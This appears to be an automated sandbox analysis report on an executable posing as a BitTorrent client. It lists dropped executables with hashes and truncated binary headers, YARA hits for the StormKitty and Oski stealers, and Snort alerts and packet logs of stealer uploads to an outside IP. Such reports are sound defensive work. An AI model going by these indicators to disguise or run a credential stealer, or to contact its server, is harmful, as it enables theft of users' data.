File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	366592
Entropy (8bit):	7.918019042246386
Encrypted:	false
SSDEEP:	6144:Aj4tMvbY1J6H2QfaJux2ME1KH5F/cpRNEav3YqMf0ZdpnHyIgOIgSMJphy:ArzY16HAIDrn/4Wav3PMMTpnHLlIgSMN
MD5:	69450EC78E3AA15178A8A90079551137
SHA1:	C77904954955906C1792B956CB58BE00A9CCB140
SHA-256:	6247F4AF4CEF102C5FD74F4544FF0D9805A9F3E3C1ECE327C5CC4D674F06C7B1
SHA-512:	DF108EA9A113476A4C891C6F52FB5F2E0C9C128660CC476F106333DDC81FB9CDC766971289D0EA7CEAAD0DDDECC531CC1FAB7C3F6B35AD0BDA546A4D450496F7
Malicious:	true
Yara Hits:	Rule: SUSP_NET_NAME_ConfuserEx, Description: Detects ConfuserEx packed file, Source: C:\Users\user\AppData\Local\Temp\chormuim.exe, Author: Arnim Rupp Rule: HKTL_NET_GUID_StormKitty, Description: Detects c# red/black-team tools via typelibguid, Source: C:\Users\user\AppData\Local\Temp\chormuim.exe, Author: Arnim Rupp
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L..`.....................\|.......8... ...@....@.. ....................................@..................................7..S....@...y........................................................................... ............... ..H............text...$.... ...................... ..`.rsrc....y...@...z..................@..@.reloc..............................@..B.................8......H.......H...............................................................~.Z\..(e.\mj..j.1.Ai...i...5..Q.}\|=_.`L....'....$.).^.I.....V.....A...h....p..6\J..Xy.-D.!...A.8(.O]..........b+.r4.Q..M\....v8p.(....tG.9....eUP'..3. w..6Lp.HTl.,.....?.\|.lU.A..u=qP.j.U.[d.....D.BOO........u...(.F.l.i+.-...}....2.....;c.+.s.2....'..M...O...J.r..:9.<..g.]g.Q....D.....6...E/....c;.~6p.v&..$x...9x.}..ZJ...IG.6X.K.H..X....1..=....R.:{.SZA .......c....?...j..r...z.Z7..R.3{..

C:\Users\user\AppData\Local\Temp\chormuimii.exe Download File
Process:	C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	650752
Entropy (8bit):	7.88640150268916
Encrypted:	false
SSDEEP:	12288:Qh1Lk70TnvjcOO7Ng0gaRRwlWaOvQZ/DB8BX6AT8zuQ2NH/2xXQ:sk70TrcOOxVga3D3XQzuQm2xg
MD5:	535BD46107780DBB3425E23C175E85F9
SHA1:	F2EF993FABD5FB2172DCCC6F20033B0565C04FA0
SHA-256:	37D460CEA9227867807E21051990ED580D9BAFC35746DD1F6EA48E424438EC2D
SHA-512:	82BA3C603C9D0BD3AE80DB7575E978552D3073C33C2F4957238E4F8721B6D7FB5EE4FF36143D2E62A8E48EDA7AEB4EE1A1AFCFC2ED8CCF2AB3EAF18827382646
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h..-,q.~,q.~,q.~2#.~?q.~...~+q.~,q.~\q.~2#n~.q.~2#i~.q.~2#{~-q.~Rich,q.~..................`....PE..L...t..P..........#..........R....../.............@..........................0.......;..........................................P....`..$...............................................................@............................................text............................... ..`.rdata...m.......n..................@..@.data....0... ......................@....rsrc...$....`....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\dll.exe Download File
Process:	C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34304
Entropy (8bit):	3.5683871804810248
Encrypted:	false
SSDEEP:	768:T/0bVbK+e8Tkr39y/SW6AJDLocaU3pu3RpfZ77:T09KvTr86ln
MD5:	461CBDD5B0D2801A736E21AEF6C7CED3
SHA1:	62AC275945407DC00402EEB2272FE1E47FB6D7E0
SHA-256:	9EB507B9BFF383E0C96F4D535352978A801B02E4C00C8416882A3F4F7A625595
SHA-512:	85F6513D0FABB5D3BB9E045C8A3C0A11F833B33FF1BE8ADCDB76E61D44216C7CAE14CEF594747BBDB51FCE755814ADE02F4DB60A2F2319B7E5921624BD7B0ABB
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Vc.^.........."...0..\|............... ........@.. ....................................@.................................P...K.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......X!...x..........................................................".(.........0...........r...p.r.p.p.r<p.p(..............,..r<p.p(......o..... ....(.......(..........,....(.......(....& ....(.....rPp.p.(......r.p.p(.....(....(......r.p.p(.....(......r.p.p(....(....&~....r.p.po........r.p.p.r.p.p(....o.......o.....(....o......BSJB............v4.0.30319......l...t...#~......t...#Strings....T...$q..#US.xw......#GUID....w..p...#Blob...........G.........%3................

C:\Users\user\AppData\Local\Temp\svchoste.exe Download File
Process:	C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	204800
Entropy (8bit):	6.513547817910089
Encrypted:	false
SSDEEP:	3072:WfUomEuYm98dlSq7gt5q7Dx+XgS6aCEwhOfUbCalNT2pbB3fIo1Xi6FLPo3c:WfUauY68uSWCx+XA7mg2pNx1Ljo3c
MD5:	9F209B4720986407A79BD4C598087587
SHA1:	BA52F693587EF169D590351639B4C810DCCD8427
SHA-256:	76488918853CE10B808BD2FAD4F8C37FF9CA59F321C03C7700E0771F922113D3
SHA-512:	FCE9032027D61EC4026B2DC4F762D7D05E1AC820B1DC6BA6AD6B8631A040389FC8A838A9A1778992263430411D38ECB60085F87454BDEFFF7BE3A2A0345C122E
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Oski, Description: Yara detected Oski Stealer, Source: C:\Users\user\AppData\Local\Temp\svchoste.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........; ._ZN._ZN._ZN....^ZN.0,.GZN.0,..ZN.0,.lZN.V".]ZN.V".XZN._ZO.3ZN.0,.TZN.0,.^ZN.Rich_ZN.................PE..L......_.................Z..........{q.......p....@.......................................@.................................d...P............................P..\!......................................@............p...............................text...#Y.......Z.................. ..`.rdata..x....p.......^..............@..@.data...(D..........................@....reloc...,...P......................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp3B84.tmp.dat Download File
Process:	C:\Users\user\AppData\Local\Temp\chormuim.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7B6F.tmp.dat Download File
Process:	C:\Users\user\AppData\Local\Temp\chormuim.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpD3BF.tmp.dat Download File
Process:	C:\Users\user\AppData\Local\Temp\chormuim.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpD6AE.tmp.dat Download File
Process:	C:\Users\user\AppData\Local\Temp\chormuim.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6970840431455908
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
MD5:	00681D89EDDB6AD25E6F4BD2E66C61C6
SHA1:	14B2FBFB460816155190377BBC66AB5D2A15F7AB
SHA-256:	8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
SHA-512:	159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpEBCE.tmp.dat Download File
Process:	C:\Users\user\AppData\Local\Temp\chormuim.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	118784
Entropy (8bit):	0.4589421877427324
Encrypted:	false
SSDEEP:	48:T9YBfHNPM5ETQTbKPHBsRkOLkRf+z4QHItYysX0uhnHu132RUioVeINUravDLjY/:2WU+bDoYysX0uhnydVjN9DLjGQLBE3u
MD5:	16B54B80578A453C3615068532495897
SHA1:	03D021364027CDE0E7AE5008940FEB7E07CA293C
SHA-256:	75A16F4B0214A2599ECFBB1F66CAE146B257D11106494858969B19CABCB9B541
SHA-512:	C11979FE1C82B31FDD6457C8C2D157FB4C9DF4FE55457D54104B59F3F880898D82A947049DEB948CA48A5A64A75CFBFC38FDB2E108026EBE7CA9EBE8B1793797
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpED36.tmp.dat Download File
Process:	C:\Users\user\AppData\Local\Temp\chormuim.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	118784
Entropy (8bit):	0.4589421877427324
Encrypted:	false
SSDEEP:	48:T9YBfHNPM5ETQTbKPHBsRkOLkRf+z4QHItYysX0uhnHu132RUioVeINUravDLjY/:2WU+bDoYysX0uhnydVjN9DLjGQLBE3u
MD5:	16B54B80578A453C3615068532495897
SHA1:	03D021364027CDE0E7AE5008940FEB7E07CA293C
SHA-256:	75A16F4B0214A2599ECFBB1F66CAE146B257D11106494858969B19CABCB9B541
SHA-512:	C11979FE1C82B31FDD6457C8C2D157FB4C9DF4FE55457D54104B59F3F880898D82A947049DEB948CA48A5A64A75CFBFC38FDB2E108026EBE7CA9EBE8B1793797
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve Download File
Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1572864
Entropy (8bit):	4.2702296406876865
Encrypted:	false
SSDEEP:	12288:4b20Th312ap8TSP5ve7dcb5GMtzr8VxmoKwPjMQ2ZlPfq+kwX2je/:A20Th312ap8TSPd5
MD5:	C7D2F051EBB3F9C5C5059E83B74266F2
SHA1:	9FF6AEAEBFB555D3905D891E710CF5515E1D8177
SHA-256:	6B2D09834ED8E656C27966878D396A321B04DC5C3CE146A4D6CE57848D299550
SHA-512:	F324FC305EABE61CD53EED2C3F76B8DB66388E0EEBACB46E9E5716C39BFF7AADE51BF86860FDB3FA6FEAF4F017D3CD4630994D9D9A84A7EC4E8DE0A73E859B19
Malicious:	false
Reputation:	unknown
Preview:	regfY...Y...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.................................................................................................................................................................................................................................................................................................................................................2...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.711389468735713
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01%
File name:	18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe
File size:	888320
MD5:	39bfd2ce7cffeafc8f4d85d89fd6f072
SHA1:	9d0df13ef8de579a2bbfba88e938a836ffab1069
SHA256:	18719d6856a09a622001f1c325067d56afa63bd21fbad25fd23c01b2c0c67472
SHA512:	d2e4b81133cb427a52ba10cbde23ea16ed33dc0c57affc55afa0ca5bbf68e03841e258ca153c5f217fe0f4f483f3705882eb556718f9c98f508db7144b7b51bb
SSDEEP:	24576:C8SHUGk70TrcOOxVga3D3XQzuQm2xmZj:OPkQTAzzD3DQzuQxYZ
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...3.Wa.....................z........... ...@....@.. ....................................@................................

File Icon


Icon Hash:	71e8e6ecc8d8f831

Static PE Info

General
Entrypoint:	0x412e1e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x61579133 [Fri Oct 1 22:52:35 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x12dd0	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd4000	0x78bc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xdc000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x10e24	0x11000	False	0.544088924632	data	6.02939693015	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.sdata	0x14000	0xbfce8	0xbfe00	False	0.891823595277	data	7.83045579501	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0xd4000	0x78bc	0x7a00	False	0.583472079918	data	6.22342815857	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xdc000	0xc	0x200	False	0.044921875	data	0.0980041756627	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0xd41f0	0x2c70	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON	0xd6e60	0x25a8	data
RT_ICON	0xd9408	0x10a8	data
RT_ICON	0xda4b0	0x988	data
RT_ICON	0xdae38	0x468	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0xdb2a0	0x4c	data
RT_VERSION	0xdb2ec	0x2e4	data
RT_MANIFEST	0xdb5d0	0x2e9	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	2020 BitTorrent, Inc. All Rights Reserved.
Assembly Version	3.5.5.46096
InternalName	all.exe
FileVersion	3.5.5.46096
ProductName	Torrent
ProductVersion	3.5.5.46096
FileDescription	Torrent
OriginalFilename	all.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/14/22-13:49:21.338746	TCP	2034813	ET TROJAN Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern	49743	80	192.168.2.3	108.167.165.140
01/14/22-13:49:22.204152	TCP	2034813	ET TROJAN Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern	49743	80	192.168.2.3	108.167.165.140
01/14/22-13:49:23.240383	TCP	2034813	ET TROJAN Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern	49743	80	192.168.2.3	108.167.165.140
01/14/22-13:49:24.106172	TCP	2034813	ET TROJAN Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern	49743	80	192.168.2.3	108.167.165.140
01/14/22-13:49:24.536779	TCP	2034813	ET TROJAN Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern	49743	80	192.168.2.3	108.167.165.140
01/14/22-13:49:25.466286	TCP	2034813	ET TROJAN Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern	49743	80	192.168.2.3	108.167.165.140
01/14/22-13:49:27.435801	TCP	2034813	ET TROJAN Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern	49743	80	192.168.2.3	108.167.165.140
01/14/22-13:49:29.727825	TCP	2034813	ET TROJAN Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern	49743	80	192.168.2.3	108.167.165.140
01/14/22-13:49:32.576793	TCP	2034813	ET TROJAN Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern	49743	80	192.168.2.3	108.167.165.140

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2022 13:49:21.190032005 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.336144924 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.336325884 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.338746071 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.484899998 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.506848097 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.506890059 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.506916046 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.506937981 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.506961107 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.506983995 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.507005930 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.507029057 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.507033110 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.507051945 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.507076025 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.507087946 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.507123947 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.652792931 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.652849913 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.652889013 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.652929068 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.652966022 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.652998924 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.653258085 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.653296947 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.653330088 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.653336048 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.653374910 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.653388977 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.653394938 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.653414011 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.653419018 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.653454065 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.653461933 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.653492928 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.653497934 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.653532982 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.653546095 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.653573036 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.653575897 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.653609991 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.653621912 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.653649092 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.653660059 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.653687954 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.653700113 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.653726101 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.653738022 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.653764963 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.653783083 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.653805017 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.653817892 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.653845072 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.653860092 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.653915882 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.799638033 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.799671888 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.799685001 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.799696922 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.799712896 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.799731016 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.799747944 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.799765110 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.799784899 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.799837112 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.800973892 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.800993919 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.801009893 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.801029921 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.801043034 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.801055908 CET	80	49743	108.167.165.140	192.168.2.3
